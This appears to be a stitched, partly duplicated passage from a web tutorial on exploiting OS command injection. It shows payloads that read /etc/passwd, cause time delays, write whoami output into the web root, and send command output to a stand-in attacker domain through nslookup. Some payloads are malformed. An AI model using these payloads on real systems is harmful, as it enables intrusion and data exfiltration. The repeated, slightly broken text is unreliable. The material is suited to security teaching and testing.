The sleep command only works for Unix system but the ping command works for both Unix and Windows.
Both commands works the same way, trigger a time delay of 10 seconds.
This example only proves that there is a blind command injection but doesn't prove it have any impact from the command injection.
To prove impact: Output the response of the command in the web root and retrieve the file directly using a browser.
127.0.0.1 & whoami > /var/www/static/whoami.txt &
running the "whoami" command, redirecting the output to "/var/www/static" (available to anyone using the application), saving it in a file "whoami.txt
If you browse to this directory from your browser and see there is a file called "whoami.txt" then the command injection was successful and the context of the .txt will be the output from the "whoami" command.
Another way to prove both command injection exists and exploitable is to show impact to open an out-of-band channel back to a server you control.
127.0.0.1 & nslookup kgi2ohoyw.web-attacker.com &
To prove it is vulnerable to bind command injection: run the "nslookup" command on the server that you control "kgi2ohoyw.web-attacker.com".
Since you control that server, you would be monitoring the logs to see if the vulnerable application performed a lookup on your attacker controlled server.
If it did, then it's vulnerable to command injection. If it did not, then it's not.
To prove impact for this method: need to run a command within a command.
run the "whoami" command. It appends the response as a subdomain of your attacker controlled domain, and then performs a "nslookup" of that sub domain.
Automated Exploitation Tools
Web Application Vulnerability Scanner (WAVS), any decent scanner should be able to scan for command injection.
Mastering Command Injection Part 3
How To Exploit Command Injection?
Exploiting In-Band Command Injection
Shell metacharacters:
&
,&&
,|
,||
,;
,\n
,`
,$()
.Concatenate another command
127.0.0.1 && cat /etc/passwd &
or127.0.0.1 & cat /etc/passwd &
or127.0.0.1 || cat /etc/passwd &
Exploiting Blind Command Injection
Shell metacharacters:
&
,&&
,|
,||
,;
,\n
,`
,$()
.Trigger a time delay.
127.0.0.1 && sleep 10 &
or127.0.0.1 && ping -c 10 127.0.0.1 &
The sleep command only works for Unix system but the ping command works for both Unix and Windows.
Both commands works the same way, trigger a time delay of 10 seconds.
This example only proves that there is a blind command injection but doesn't prove it have any impact from the command injection.
To prove impact: Output the response of the command in the web root and retrieve the file directly using a browser.
127.0.0.1 & whoami > /var/www/static/whoami.txt &
If you browse to this directory from your browser and see there is a file called "whoami.txt" then the command injection was successful and the context of the .txt will be the output from the "whoami" command.
Another way to prove both command injection exists and exploitable is to show impact to open an out-of-band channel back to a server you control.
127.0.0.1 & nslookup kgi2ohoyw.web-attacker.com &
To prove it is vulnerable to bind command injection: run the "nslookup" command on the server that you control "kgi2ohoyw.web-attacker.com".
Since you control that server, you would be monitoring the logs to see if the vulnerable application performed a lookup on your attacker controlled server.
To prove impact for this method: need to run a command within a command.
127.0.0.1 & nslookup `whoami` .kgi2ohoyw.web-attacker.com &
or127.0.0.1 & nslookup $whoami$ .kgi2ohoyw.web-attacker.com &
run the "whoami" command. It appends the response as a subdomain of your attacker controlled domain, and then performs a "nslookup" of that sub domain.
Automated Exploitation Tools
Web Application Vulnerability Scanner (WAVS), any decent scanner should be able to scan for command injection.
Burp scanner
Arachni
OWASP Zap
Wapiti
Acunetix
W3af